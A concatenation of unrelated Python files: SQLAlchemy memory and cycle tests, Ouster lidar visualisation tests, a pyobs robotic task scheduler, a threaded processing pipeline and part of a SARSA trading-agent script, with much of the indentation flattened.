sess.query(B).options(subqueryload(B.as_.of_type(ASub))).all()
sess.close()
del sess
try:
go()
finally:
metadata.drop_all(self.engine)
clear_mappers()
def test_path_registry(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Column("bar", Integer),
)
b = Table(
"b",
metadata,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
m1 = mapper(A, a, properties={"bs": relationship(B)})
mapper(B, b)
@profile_memory()
def go():
ma = sa.inspect(aliased(A))
m1._path_registry[m1.attrs.bs][ma][m1.attrs.bar]
go()
clear_mappers()
def test_with_inheritance(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
ForeignKey("mytable.col1"),
primary_key=True,
test_needs_autoincrement=True,
),
Column("col3", String(30)),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(A):
pass
mapper(
A,
table1,
polymorphic_on=table1.c.col2,
polymorphic_identity="a",
)
mapper(B, table2, inherits=A, polymorphic_identity="b")
sess = create_session(self.engine)
a1 = A()
a2 = A()
b1 = B(col3="b1")
b2 = B(col3="b2")
for x in [a1, a2, b1, b2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(), A(), B(col3="b1"), B(col3="b2")], alist)
for a in alist:
sess.delete(a)
sess.flush()
# don't need to clear_mappers()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_with_manytomany(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table3 = Table(
"t1tot2",
metadata,
Column("t1", Integer, ForeignKey("mytable.col1")),
Column("t2", Integer, ForeignKey("mytable2.col1")),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
mapper(
A,
table1,
properties={
"bs": relationship(
B, secondary=table3, backref="as", order_by=table3.c.t1
)
},
)
mapper(B, table2)
sess = create_session(self.engine)
a1 = A(col2="a1")
a2 = A(col2="a2")
b1 = B(col2="b1")
b2 = B(col2="b2")
a1.bs.append(b1)
a2.bs.append(b2)
for x in [a1, a2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(bs=[B(col2="b1")]), A(bs=[B(col2="b2")])], alist)
for a in alist:
sess.delete(a)
sess.flush()
# mappers necessarily find themselves in the compiled cache,
# so to allow them to be GC'ed clear out the cache
self.engine.clear_compiled_cache()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
@testing.uses_deprecated()
@testing.provide_metadata
def test_key_fallback_result(self):
e = self.engine
m = self.metadata
t = Table("t", m, Column("x", Integer), Column("y", Integer))
m.create_all(e)
e.execute(t.insert(), {"x": 1, "y": 1})
@profile_memory()
def go():
r = e.execute(t.alias().select())
for row in r:
row[t.c.x]
go()
def test_many_discarded_relationships(self):
"""a use case that really isn't supported, nonetheless we can
guard against memleaks here so why not"""
m1 = MetaData()
t1 = Table("t1", m1, Column("id", Integer, primary_key=True))
t2 = Table(
"t2",
m1,
Column("id", Integer, primary_key=True),
Column("t1id", ForeignKey("t1.id")),
)
class T1(object):
pass
t1_mapper = mapper(T1, t1)
@testing.emits_warning()
@profile_memory()
def go():
class T2(object):
pass
t2_mapper = mapper(T2, t2)
t1_mapper.add_property("bar", relationship(t2_mapper))
s1 = fixture_session()
# this causes the path_registry to be invoked
s1.query(t1_mapper)._compile_context()
go()
# fails on newer versions of pysqlite due to unusual memory behavior
# in pysqlite itself. background at:
# http://thread.gmane.org/gmane.comp.python.db.pysqlite.user/2290
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache_deprecated_coercion(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo(object):
pass
class Bar(object):
pass
mapper(
Foo, table1, properties={"bars": relationship(mapper(Bar, table2))}
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select()
sess = session()
with testing.expect_deprecated(
"Implicit coercion of SELECT and " "textual SELECT constructs"
):
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo(object):
pass
class Bar(object):
pass
mapper(
Foo, table1, properties={"bars": relationship(mapper(Bar, table2))}
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select().subquery()
sess = session()
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
class CycleTest(_fixtures.FixtureTest):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
cls._setup_stock_mapping()
def test_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).all()
go()
def test_session_execute_orm(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
stmt = select(User)
s.execute(stmt)
go()
def test_cache_key(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
stmt = select(User)
stmt._generate_cache_key()
go()
def test_proxied_attribute(self):
from sqlalchemy.ext import hybrid
users = self.tables.users
class Foo(object):
@hybrid.hybrid_property
def user_name(self):
return self.name
mapper(Foo, users)
        # Unfortunately there are a lot of cycles with an aliased() for now;
        # however, calling upon __clause_element__() does not seem to make it
        # worse, which is what this test is checking.
@assert_cycles(68)
def go():
a1 = aliased(Foo)
a1.user_name.__clause_element__()
go()
def test_raise_from(self):
@assert_cycles()
def go():
try:
try:
raise KeyError("foo")
except KeyError as ke:
util.raise_(Exception("oops"), from_=ke)
except Exception as err: # noqa
pass
go()
def test_query_alias(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
u1 = aliased(User)
@assert_cycles()
def go():
s.query(u1).all()
go()
def test_entity_path_w_aliased(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)._path_registry[User.addresses.property]
go()
def test_orm_objects_from_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
def generate():
objects = s.query(User).filter(User.id == 7).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_orm_objects_from_query_w_selectinload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(selectinload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_selectinload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
selectinload(User.addresses)
go()
def test_selectinload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
Load(User).selectinload(User.addresses)
go()
def test_orm_path(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
inspect(User)._path_registry[User.addresses.property][
inspect(Address)
]
go()
def test_joinedload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
joinedload(User.addresses)
go()
def test_joinedload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
l1 = Load(User).joinedload(User.addresses)
l1._generate_cache_key()
go()
def test_orm_objects_from_query_w_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(joinedload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_query_filtered(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).filter(User.id == 7).all()
go()
def test_query_joins(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
        # Cycles here are due to ClauseElement._cloned_set; the others are
        # due to the cache key.
@assert_cycles(4)
def go():
s.query(User).join(User.addresses).all()
go()
def test_query_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
s.query(User).options(joinedload(User.addresses)).all()
        # Cycles here are due to ClauseElement._cloned_set and Load.context;
        # the others are due to the cache key. The orm.instances() function
        # now calls dispose() on both the context and the compiled state to
        # try to reduce these cycles.
@assert_cycles(18)
def go():
generate()
go()
def test_plain_join(self):
users, addresses = self.tables("users", "addresses")
@assert_cycles()
def go():
str(users.join(addresses).compile(testing.db))
go()
def test_plain_join_select(self):
users, addresses = self.tables("users", "addresses")
        # Cycles here are due to ClauseElement._cloned_set; the others are
        # due to the cache key.
@assert_cycles(7)
def go():
s = select(users).select_from(users.join(addresses))
state = s._compile_state_factory(s, s.compile(testing.db))
state.froms
go()
def test_orm_join(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
str(orm_join(User, Address, User.addresses).compile(testing.db))
go()
def test_join_via_query_relationship(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(User.addresses)
go()
def test_join_via_query_to_entity(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(Address)
go()
def test_result_fetchone(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.connection(mapper=User).execute(stmt)
while True:
row = result.fetchone()
if row is None:
break
go()
def test_result_fetchall(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
rows = result.fetchall() # noqa
go()
def test_result_fetchmany(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.partitions(3):
pass
go()
def test_result_fetchmany_unique(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.unique().partitions(3):
pass
go()
def test_core_select_from_orm_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
        # An ORM query using the future select() for .statement adds some
        # ORMJoin cycles here during compilation; not worth trying to track
        # them down.
@assert_cycles(4)
def go():
s.execute(stmt)
go()
def test_adapt_statement_replacement_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
replacement_traverse(statement, {}, lambda x: None)
go()
def test_adapt_statement_cloned_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
cloned_traverse(statement, {}, {})
go()
def test_column_adapter_lookup(self):
User, Address = self.classes("User", "Address")
u1 = aliased(User)
@assert_cycles()
def go():
adapter = sql_util.ColumnAdapter(inspect(u1).selectable)
adapter.columns[User.id]
go()
def test_orm_aliased(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)
go()
@testing.fails()
def test_the_counter(self):
@assert_cycles()
def go():
x = []
x.append(x)
go()
def test_weak_sequence(self):
class Foo(object):
pass
f = Foo()
@assert_cycles()
def go():
util.WeakSequence([f])
go()
@testing.provide_metadata
def test_optimized_get(self):
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base(metadata=self.metadata)
class Employee(Base):
__tablename__ = "employee"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(10))
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Employee):
__tablename__ = " engineer"
id = Column(ForeignKey("employee.id"), primary_key=True)
engineer_name = Column(String(50))
__mapper_args__ = {"polymorphic_identity": "engineer"}
Base.metadata.create_all(testing.db)
s = Session(testing.db)
s.add(Engineer(engineer_name="wally"))
s.commit()
s.close()
@assert_cycles()
def go():
e1 = s.query(Employee).first()
e1.engineer_name
go()
def test_visit_binary_product(self):
a, b, q, e, f, j, r = [column(chr_) for chr_ in "abqefjr"]
from sqlalchemy import and_, func
from sqlalchemy.sql.util import visit_binary_product
expr = and_((a + b) == q + func.sum(e + f), j == r)
def visit(expr, left, right):
pass
@assert_cycles()
def go():
visit_binary_product(visit, expr)
go()
def test_session_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.close()
go()
def test_session_commit_rollback(self):
# this is enabled by #5074
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.commit()
go()
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.rollback()
go()
def test_session_multi_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
assert s._transaction is None
s.connection()
s.close()
assert s._transaction is None
s.connection()
assert s._transaction is not None
s.close()
go()
|
test_viz.py
|
"""
Copyright (c) 2021, Ouster, Inc.
All rights reserved.
"""
import weakref
from typing import TYPE_CHECKING, Tuple
import pytest
import numpy as np
import random
from ouster import client
# The test env may not have OpenGL, but all test modules are imported during
# collection. The import is still needed for type checking.
if TYPE_CHECKING:
from ouster.sdk import viz
else:
viz = pytest.importorskip('ouster.sdk.viz')
# mark all tests in this module so they only run with the --interactive flag
pytestmark = pytest.mark.interactive
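# Build a 2x2 checkerboard tile out of `square_size`-sized squares (a block
# of zeros stacked next to and above its logical inverse) and repeat it
# `reps` times in each direction, producing a 0/1 image for the viz.Image
# smoke tests below.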
def make_checker_board(square_size: int, reps: Tuple[int, int]) -> np.ndarray:
img_data = np.full((square_size, square_size), 0)
img_data = np.hstack([img_data, np.logical_xor(img_data, 1)])
img_data = np.vstack([img_data, np.logical_xor(img_data, 1)])
img_data = np.tile(img_data, reps)
return img_data
@pytest.fixture
def point_viz() -> viz.PointViz:
point_viz = viz.PointViz("Test Viz",
fix_aspect=True,
window_width=640,
window_height=480)
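    # Hold only a weak reference to the viz inside the key handler, presumably
    # so the registered callback does not keep the PointViz instance alive via
    # a reference cycle (compare test_point_viz_destruction below).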
weakself = weakref.ref(point_viz)
def handle_keys(ctx, key, mods) -> bool:
self = weakself()
if self is not None and key == 256: # ESC
self.running(False)
return True
point_viz.push_key_handler(handle_keys)
return point_viz
def test_point_viz_image(point_viz: viz.PointViz) -> None:
"""Test displaying a full-window image."""
img = viz.Image()
img.set_position(-4 / 3, 4 / 3, -1, 1)
img.set_image(
np.tile(np.linspace(0.0, 1.0, 640, dtype=np.float32), (480, 1)))
point_viz.add(img)
point_viz.update()
point_viz.run()
def test_point_viz_image_with_labels_aligned(point_viz: viz.PointViz) -> None:
"""Test displaying a set of images aligned to the corners."""
red_rgba = (1.0, 0.3, 0.3, 1)
blue_rgba = (0.3, 0.3, 1.0, 1)
green_rgba = (0.3, 1.0, 0.3, 1)
yellow_rgba = (1.0, 1.0, 0.3, 1)
cyan_rgba = (1.0, 0.3, 1.0, 1)
magenta_rgba = (0.3, 1.0, 1.0, 1)
white_rgba = (1.0, 1.0, 1.0, 1)
gray_rgba = (0.5, 0.5, 0.5, 1)
colors = [red_rgba, blue_rgba, green_rgba, yellow_rgba, cyan_rgba, magenta_rgba, white_rgba,
gray_rgba]
ylen = 0.15
xlen_calc = lambda vlen, shape: shape[1] * vlen / shape[0]
label_posx = lambda posx: (posx + 1) / 2
label_posy = lambda posy: 1 - (posy + 1) / 2
def gen_rand_img():
return make_checker_board(10, (random.randrange(2, 5), random.randrange(2, 5)))
def gen_rand_color():
return random.choice(colors)
    def add_image(im_data, xpos, ypos, hshift=0):
img = viz.Image()
img.set_position(*xpos, *ypos)
img.set_image(im_data)
img.set_hshift(hshift)
point_viz.add(img)
def add_label(text, xpos, ypos, align_right=False, align_top=False, rgba=None, scale=2):
xpos = label_posx(xpos)
ypos = label_posy(ypos)
label = viz.Label(text, xpos, ypos, align_right=align_right, align_top=align_top)
label.set_rgba(rgba if rgba else gen_rand_color())
label.set_scale(scale)
point_viz.add(label)
# center
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [- ylen / 2, ylen / 2] # center
xpos = [- xlen / 2, xlen / 2]
add_image(img_data, xpos, ypos, 0)
add_label("Center", 0, ypos[1])
# top left
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [1 - ylen, 1] # top
xpos = [0, xlen]
add_image(img_data, xpos, ypos, -1.0)
add_label("Top Left - top", -1.0, ypos[1], align_top=True)
add_label("Top Left - bottom", -1.0, ypos[0], align_top=False)
# top right
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [1 - ylen, 1] # top
xpos = [- xlen, 0]
add_image(img_data, xpos, ypos, 1.0)
add_label("Top Right - top", 1.0, ypos[1], align_right=True, align_top=True)
add_label("Top Right - bottom", 1.0, ypos[0], align_right=True, align_top=False)
# bottom left
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [-1, -1 + ylen] # bottom
xpos = [0, xlen]
add_image(img_data, xpos, ypos, -1.0)
add_label("Bottom Left - top", -1.0, ypos[1], align_right=False, align_top=True)
add_label("Bottom Left - bottom", -1.0, ypos[0], align_right=False, align_top=False)
# bottom right
img_data = gen_rand_img()
xlen = xlen_calc(ylen, img_data.shape)
ypos = [-1, -1 + ylen] # bottom
xpos = [-xlen, 0]
add_image(img_data, xpos, ypos, 1.0)
add_label("Bottom Right - top", 1.0, ypos[1], align_right=True, align_top=True)
add_label("Bottom Right - bottom", 1.0, ypos[0], align_right=True, align_top=False)
point_viz.update()
point_viz.run()
def test_point_viz_labels(point_viz: viz.PointViz) -> None:
"""Smoke test rendering labels."""
label1 = viz.Label("Foobar", 0, 0, 1)
label1.set_scale(0.75)
label2 = viz.Label("Baz\nQux", 0, 0, 0)
label3 = viz.Label("Quux", 1, 1, align_right=True)
label3.set_scale(2.5)
point_viz.add(label1)
point_viz.add(label2)
point_viz.add(label3)
point_viz.camera.dolly(250)
point_viz.update()
point_viz.run()
def test_point_viz_cloud_unstructured(point_viz: viz.PointViz) -> None:
"""Smoke test rendering unstructured clouds."""
import math
import threading
import time
cloud = viz.Cloud(1024)
point_viz.add(cloud)
cloud.set_xyz(np.random.rand(1024, 3).astype(np.float32) * 30 - 15)
cloud.set_key(np.random.rand(1024).astype(np.float32))
quit = threading.Event()
def animate() -> None:
ticks = 0
while not quit.is_set():
t = (ticks % 300) / 150.0 * math.pi
pose = np.array(
[
[math.cos(t), math.sin(-t), 0, 0], # rotate about z
[math.sin(t), math.cos(t), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
],
order='F')
cloud.set_pose(pose)
point_viz.update()
ticks += 1
time.sleep(0.0333)
thread = threading.Thread(target=animate)
thread.start()
point_viz.run()
quit.set()
thread.join()
def test_point_viz_destruction() -> None:
"""Check that PointViz is destroyed deterministically."""
point_viz = viz.PointViz("Test Viz")
ref = weakref.ref(point_viz)
del point_viz
assert ref() is None
@pytest.mark.parametrize('test_key', ['legacy-2.0'])
def test_scan_viz_destruction(meta: client.SensorInfo,
point_viz: viz.PointViz) -> None:
"""Check that LidarScan is destroyed deterministically."""
ls_viz = viz.LidarScanViz(meta, point_viz)
ref = weakref.ref(ls_viz)
del ls_viz
assert ref() is None
@pytest.mark.parametrize('test_key', ['legacy-2.0'])
def test_viz_multiple_instances(meta: client.SensorInfo,
scan: client.LidarScan) -> None:
"""Check that destructing a visualizer doesn't break other instances."""
point_viz = viz.PointViz("Test Viz")
# will call destructor, make sure it doesn't do anything silly like terminate glfw
point_viz2 = viz.PointViz("Test Viz2")
del point_viz2
ls_viz = viz.LidarScanViz(meta, point_viz)
ls_viz.scan = scan
ls_viz.draw()
point_viz.run()
def test_scan_viz_smoke(meta: client.SensorInfo,
scan: client.LidarScan) -> None:
"""Smoke test LidarScan visualization."""
ls_viz = viz.LidarScanViz(meta)
ls_viz.scan = scan
ls_viz.draw()
ls_viz.run()
@pytest.mark.parametrize('test_key', ['legacy-2.0'])
def test_scan_viz_extras(meta: client.SensorInfo,
scan: client.LidarScan) -> None:
"""Check rendering of labels, cuboids, clouds and images together."""
point_viz = viz.PointViz("Test Viz")
ls_viz = viz.LidarScanViz(meta, point_viz)
cube1 = viz.Cuboid(np.identity(4), (1.0, 0, 0))
# scaled in y and translated in x
pose2 = np.array([
[1, 0, 0, 5],
[0, 2, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1],
])
cube2 = viz.Cuboid(pose2, (0, 1, 0, 0.5))
label1 = viz.Label("Baz\nQux", 0.0, 0.0, 2.0)
point_viz.add(label1)
point_viz.add(cube1)
point_viz.add(cube2)
ls_viz.scan = scan
point_viz.camera.dolly(150)
ls_viz.draw()
point_viz.run()
|
mastermind.py
|
import logging
import threading
from typing import Union, List, Dict, Tuple, Any
import astropy.units as u
from pyobs.modules import Module
from pyobs.object import get_object
from pyobs.events.taskfinished import TaskFinishedEvent
from pyobs.events.taskstarted import TaskStartedEvent
from pyobs.interfaces import IFitsHeaderProvider, IAutonomous
from pyobs.robotic.taskarchive import TaskArchive
from pyobs.robotic.task import Task
from pyobs.utils.time import Time
log = logging.getLogger(__name__)
class Mastermind(Module, IAutonomous, IFitsHeaderProvider):
"""Mastermind for a full robotic mode."""
__module__ = 'pyobs.modules.robotic'
def __init__(self, tasks: Union[TaskArchive, dict], allowed_late_start: int = 300, allowed_overrun: int = 300,
                 *args, **kwargs):
        """Initialize a new robotic mastermind.
Args:
tasks: Task archive to use
allowed_late_start: Allowed seconds to start late.
            allowed_overrun: Allowed time in seconds for a task to exceed its window.
"""
Module.__init__(self, *args, **kwargs)
# store
self._allowed_late_start = allowed_late_start
self._allowed_overrun = allowed_overrun
self._running = False
# add thread func
self.add_thread_func(self._run_thread, True)
# get task archive
self._task_archive: TaskArchive = get_object(tasks, object_class=TaskArchive,
comm=self.comm, vfs=self.vfs, observer=self.observer)
# observation name and exposure number
self._task = None
self._obs = None
self._exp = None
def open(self):
"""Open module."""
Module.open(self)
# subscribe to events
if self.comm:
self.comm.register_event(TaskStartedEvent)
self.comm.register_event(TaskFinishedEvent)
# start
self._running = True
# open scheduler
self._task_archive.open()
def close(self):
"""Close module."""
Module.close(self)
# close scheduler
self._task_archive.close()
def start(self, *args, **kwargs):
"""Starts a service."""
log.info('Starting robotic system...')
self._running = True
def stop(self, *args, **kwargs):
"""Stops a service."""
log.info('Stopping robotic system...')
self._running = False
def is_running(self, *args, **kwargs) -> bool:
"""Whether a service is running."""
return self._running
def _run_thread(self):
# wait a little
self.closing.wait(1)
# flags
first_late_start_warning = True
# run until closed
while not self.closing.is_set():
# not running?
if not self._running:
# sleep a little and continue
self.closing.wait(1)
continue
# get now
now = Time.now()
# find task that we want to run now
task: Task = self._task_archive.get_task(now)
if task is None or not task.can_run():
# no task found
self.closing.wait(10)
continue
# starting too late?
if not task.can_start_late:
late_start = now - task.start
if late_start > self._allowed_late_start * u.second:
# only warn once
if first_late_start_warning:
log.warning('Time since start of window (%.1f) too long (>%.1f), skipping task...',
late_start.to_value('second'), self._allowed_late_start)
first_late_start_warning = False
# sleep a little and skip
self.closing.wait(10)
continue
# reset warning
first_late_start_warning = True
# set it
self._task = task
# ETA
eta = now + self._task.duration * u.second
# send event
self.comm.send_event(TaskStartedEvent(name=self._task.name, id=self._task.id, eta=eta))
# run task in thread
log.info('Running task %s...', self._task.name)
abort_event = threading.Event()
task_thread = threading.Thread(target=self._task_archive.run_task, args=(self._task, abort_event))
task_thread.start()
# wait for it
while True:
# not alive anymore?
if not task_thread.is_alive():
# finished
break
# closing?
if self.closing.is_set() or Time.now() > task.end + self._allowed_overrun * u.second:
# set event and wait for thread
abort_event.set()
task_thread.join()
break
# just sleep a little and wait
self.closing.wait(10)
# send event
self.comm.send_event(TaskFinishedEvent(name=self._task.name, id=self._task.id))
# finish
log.info('Finished task %s.', self._task.name)
self._task = None
def get_fits_headers(self, namespaces: List[str] = None, *args, **kwargs) -> Dict[str, Tuple[Any, str]]:
"""Returns FITS header for the current status of this module.
Args:
namespaces: If given, only return FITS headers for the given namespaces.
Returns:
Dictionary containing FITS headers.
"""
# inside an observation?
if self._task is not None:
hdr = self._task.get_fits_headers()
hdr['TASK'] = self._task.name, 'Name of task'
hdr['REQNUM'] = str(self._task.id), 'Unique ID of task'
return hdr
else:
return {}
__all__ = ['Mastermind']
|
pipeline.py
|
import queue
import threading
from abc import abstractmethod, ABC
from typing import Generator, List, Optional
class PipelinePacket:
def __init__(self, label, data):
self.label = label
self.data = data
class PipelineStep(ABC):
    def __init__(self, labels: Optional[List[str]]):
self.q_in = None
self.q_out = None
self.t = None
self.labels = labels
def set_q_in(self, q: queue.Queue):
self.q_in = q
def set_q_out(self, q: queue.Queue):
self.q_out = q
def __worker(self):
if self.q_in is None and self.q_out is None:
return
self.setup()
if self.q_in is None:
# We are probably the first step in the pipeline
for i_out in self.process(None):
self.q_out.put(i_out)
else:
# We have a preceding step whose items we need to process
while True:
item: PipelinePacket = self.q_in.get()
if item is None:
break
if self.labels is not None and item.label not in self.labels:
if self.q_out is not None:
self.q_out.put(item)
continue
if self.q_out is None:
# We are probably the last step in the pipeline so we ignore the output
for _ in self.process(item):
pass
else:
# We have a succeeding step to which we need to push the items
for i_out in self.process(item):
self.q_out.put(i_out)
self.q_in.task_done()
if self.q_out is not None:
self.q_out.put(None)
self.cleanup()
def start(self):
self.t = threading.Thread(target=self.__worker, daemon=True)
self.t.start()
def join(self):
self.t.join()
@abstractmethod
def setup(self):
pass
@abstractmethod
def cleanup(self):
pass
@abstractmethod
def process(self, item: PipelinePacket) -> Generator[PipelinePacket, None, None]:
return
yield
class Pipeline:
def __init__(self):
self.steps = []
def add_step(self, step):
self.steps.append(step)
def compile(self):
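        # Wire the steps together: the first step gets no input queue (pure
        # source), each subsequent step consumes the queue filled by its
        # predecessor, and the last step gets no output queue (pure sink).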
q = None
for s in self.steps[:-1]:
s.set_q_in(q)
q = queue.Queue()
s.set_q_out(q)
self.steps[-1].set_q_in(q)
def start(self):
for s in self.steps:
s.start()
def join(self):
for s in self.steps:
s.join()
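

# Illustrative usage sketch, not part of the original module: a two-step
# pipeline with a numeric source and a printing sink. The step classes below
# (NumberSource, PrintSink) are invented for demonstration only.
if __name__ == "__main__":
    class NumberSource(PipelineStep):
        def setup(self):
            pass

        def cleanup(self):
            pass

        def process(self, item):
            # First step in the pipeline: 'item' is None, so emit our own packets.
            for n in range(5):
                yield PipelinePacket("number", n)

    class PrintSink(PipelineStep):
        def setup(self):
            pass

        def cleanup(self):
            pass

        def process(self, item):
            print(item.label, item.data)
            return
            yield  # keep this a generator, matching the abstract signature

    pipeline = Pipeline()
    pipeline.add_step(NumberSource(labels=None))
    pipeline.add_step(PrintSink(labels=["number"]))
    pipeline.compile()
    pipeline.start()
    pipeline.join()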
|
algo04_sarsa.py
|
import os
import pickle
import argparse
import threading
import click
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from notebooks.helpers import hldit
from notebooks.algo.agent import PolicyBasedTrader
from notebooks.algo.environment import Environment
from notebooks.cardrive.visualize import build_evaluation_chart
def extract_policy(agent, Q):
s_S = agent.states_space_size
policy = np.full(s_S, -1)
for state in range(s_S):
# valid actions in a given state
actions = agent.get_available_actions(state)
for a in np.flip(np.argsort(Q[state])): # from best to worst
if a in actions:
policy[state] = a
break
return policy
def get_next_action(agent, Q, state, eps=1.0) -> int:
    """Return the next action for `state` using an epsilon-greedy strategy.

    With probability `eps` a random valid action is chosen (exploration);
    otherwise the greedy action of the policy extracted from Q is taken.
    """
actions = agent.get_available_actions(state)
if np.random.random() < eps:
return np.random.choice(actions)
else:
policy = extract_policy(agent, Q)
return int(policy[state])
def evaluate_q(env, Q):
agent = PolicyBasedTrader(policy=None, env=env)
policy = extract_policy(agent, Q)
for step in range(env.size):
state = agent.to_state(step, agent.amount_usd)
action = policy[state]
agent.take_action(action, state)
return agent.profit
DUMP_FILENAME = 'sarsa_q.model'
class SarsaModel(object):
def __init__(self, Q, eps):
self.Q = Q
self.eps = eps
def save(self):
print('\nSaving model to a file {}'.format(DUMP_FILENAME))
with open(DUMP_FILENAME, 'wb') as f:
pickle.dump(self, f)
@staticmethod
def load():
if os.path.exists(DUMP_FILENAME):
print('Loading model from {}'.format(DUMP_FILENAME))
with open(DUMP_FILENAME, 'rb') as f:
return pickle.load(f)
def evaluate_agent():
env = Environment()
env.load(2018)
agent = PolicyBasedTrader(policy=None, env=env)
model = SarsaModel.load()
if model is None:
raise RuntimeError('Train agent first, no model to load')
policy = extract_policy(agent, model.Q)
print('Evaluate SARSA model on env with size: {}'.format(env.size))
for step in range(env.size):
state = agent.to_state(step, agent.amount_usd)
action = policy[state]
agent.take_action(action, state)
